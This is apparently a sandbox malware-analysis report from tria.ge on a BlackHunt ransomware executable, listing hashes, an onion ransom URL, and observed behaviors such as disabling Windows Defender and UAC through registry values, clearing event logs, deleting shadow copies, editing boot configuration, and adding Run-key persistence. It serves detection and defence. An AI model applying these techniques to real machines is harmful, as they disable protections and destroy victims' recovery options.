Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:21
Static task
static1
Behavioral task
behavioral1
Sample
51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
Resource
win10v2004-20231215-en
General
-
Target
51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
-
Size
707KB
-
MD5
381c0731d3af5fb29d1d07ba29b1a747
-
SHA1
4c101e7fc3203a98f845abcce55f45f3caed89fe
-
SHA256
51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4
-
SHA512
44a26772c284e93679e61d85fae232b476a809e11e90c8676a7cbf14d60f3c8a2ec088bdf6249e70bf8ad7208c8785f014bce57223c3ecd599377bb80ac63e15
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R8Avnh:6uaTmkZJ+naie5OTamgEoKxLWEeh
Malware Config
Extracted
C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2000 fsutil.exe 5864 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 5688 wevtutil.exe 5712 wevtutil.exe 5788 wevtutil.exe 5796 wevtutil.exe 5596 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3004 bcdedit.exe 2240 bcdedit.exe 5644 bcdedit.exe 5716 bcdedit.exe -
Renames multiple (2871) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 880 wbadmin.exe 5568 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 5756 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\P: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\O: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\N: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\M: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\R: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\H: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\J: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\V: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\K: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\L: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\B: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\T: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\Y: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\A: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\I: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\Z: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\Q: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\W: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\S: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened (read-only) \??\X: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_ReadMe.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_ReadMe.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_ReadMe.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\EnterProtect.wmx 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#BlackHunt_Private.key 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2696 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1560 vssadmin.exe 5636 vssadmin.exe 2616 vssadmin.exe 3136 vssadmin.exe 1460 vssadmin.exe 2188 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5500 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5896 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 6008 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeRestorePrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeBackupPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeTakeOwnershipPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeAuditPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeSecurityPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeIncBasePriorityPrivilege 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Token: SeBackupPrivilege 2248 vssvc.exe Token: SeRestorePrivilege 2248 vssvc.exe Token: SeAuditPrivilege 2248 vssvc.exe Token: SeBackupPrivilege 2512 wbengine.exe Token: SeRestorePrivilege 2512 wbengine.exe Token: SeSecurityPrivilege 2512 wbengine.exe Token: SeSecurityPrivilege 5712 wevtutil.exe Token: SeBackupPrivilege 5712 wevtutil.exe Token: SeSecurityPrivilege 5788 wevtutil.exe Token: SeBackupPrivilege 5788 wevtutil.exe Token: SeSecurityPrivilege 5688 wevtutil.exe Token: SeBackupPrivilege 5688 wevtutil.exe Token: SeSecurityPrivilege 5796 wevtutil.exe Token: SeBackupPrivilege 5796 wevtutil.exe Token: SeSecurityPrivilege 5596 wevtutil.exe Token: SeBackupPrivilege 5596 wevtutil.exe Token: SeDebugPrivilege 5500 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2860 wrote to memory of 3040 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 29 PID 2860 wrote to memory of 3040 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 29 PID 2860 wrote to memory of 3040 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 29 PID 2860 wrote to memory of 3040 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 29 PID 2860 wrote to memory of 2948 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 31 PID 2860 wrote to memory of 2948 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 31 PID 2860 wrote to memory of 2948 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 31 PID 2860 wrote to memory of 2948 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 31 PID 2860 wrote to memory of 2144 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 33 PID 2860 wrote to memory of 2144 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 33 PID 2860 wrote to memory of 2144 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 33 PID 2860 wrote to memory of 2144 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 33 PID 3040 wrote to memory of 2568 3040 cmd.exe 34 PID 3040 wrote to memory of 2568 3040 cmd.exe 34 PID 3040 wrote to memory of 2568 3040 cmd.exe 34 PID 2860 wrote to memory of 2604 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 35 PID 2860 wrote to memory of 2604 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 35 PID 2860 wrote to memory of 2604 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 35 PID 2860 wrote to memory of 2604 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 35 PID 2860 wrote to memory of 2700 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 38 PID 2860 wrote to memory of 2700 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 38 PID 2860 wrote to memory of 2700 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 38 PID 2860 wrote to memory of 2700 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 38 PID 2948 wrote to memory of 2684 2948 cmd.exe 39 PID 2948 wrote to memory of 2684 2948 cmd.exe 39 PID 2948 wrote to memory of 2684 2948 cmd.exe 39 PID 2860 wrote to memory of 2612 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 40 PID 2860 wrote to memory of 2612 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 40 PID 2860 wrote to memory of 2612 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 40 PID 2860 wrote to memory of 2612 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 40 PID 2860 wrote to memory of 2692 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 43 PID 2860 wrote to memory of 2692 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 43 PID 2860 wrote to memory of 2692 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 43 PID 2860 wrote to memory of 2692 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 43 PID 2860 wrote to memory of 2420 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 44 PID 2860 wrote to memory of 2420 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 44 PID 2860 wrote to memory of 2420 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 44 PID 2860 wrote to memory of 2420 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 44 PID 2860 wrote to memory of 2644 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 46 PID 2860 wrote to memory of 2644 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 46 PID 2860 wrote to memory of 2644 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 46 PID 2860 wrote to memory of 2644 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 46 PID 2604 wrote to memory of 2712 2604 cmd.exe 48 PID 2604 wrote to memory of 2712 2604 cmd.exe 48 PID 2604 wrote to memory of 2712 2604 cmd.exe 48 PID 2144 wrote to memory of 2128 2144 cmd.exe 49 PID 2144 wrote to memory of 2128 2144 cmd.exe 49 PID 2144 wrote to memory of 2128 2144 cmd.exe 49 PID 2860 wrote to memory of 2732 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 50 PID 2860 wrote to memory of 2732 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 50 PID 2860 wrote to memory of 2732 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 50 PID 2860 wrote to memory of 2732 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 50 PID 2860 wrote to memory of 2632 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 52 PID 2860 wrote to memory of 2632 2860 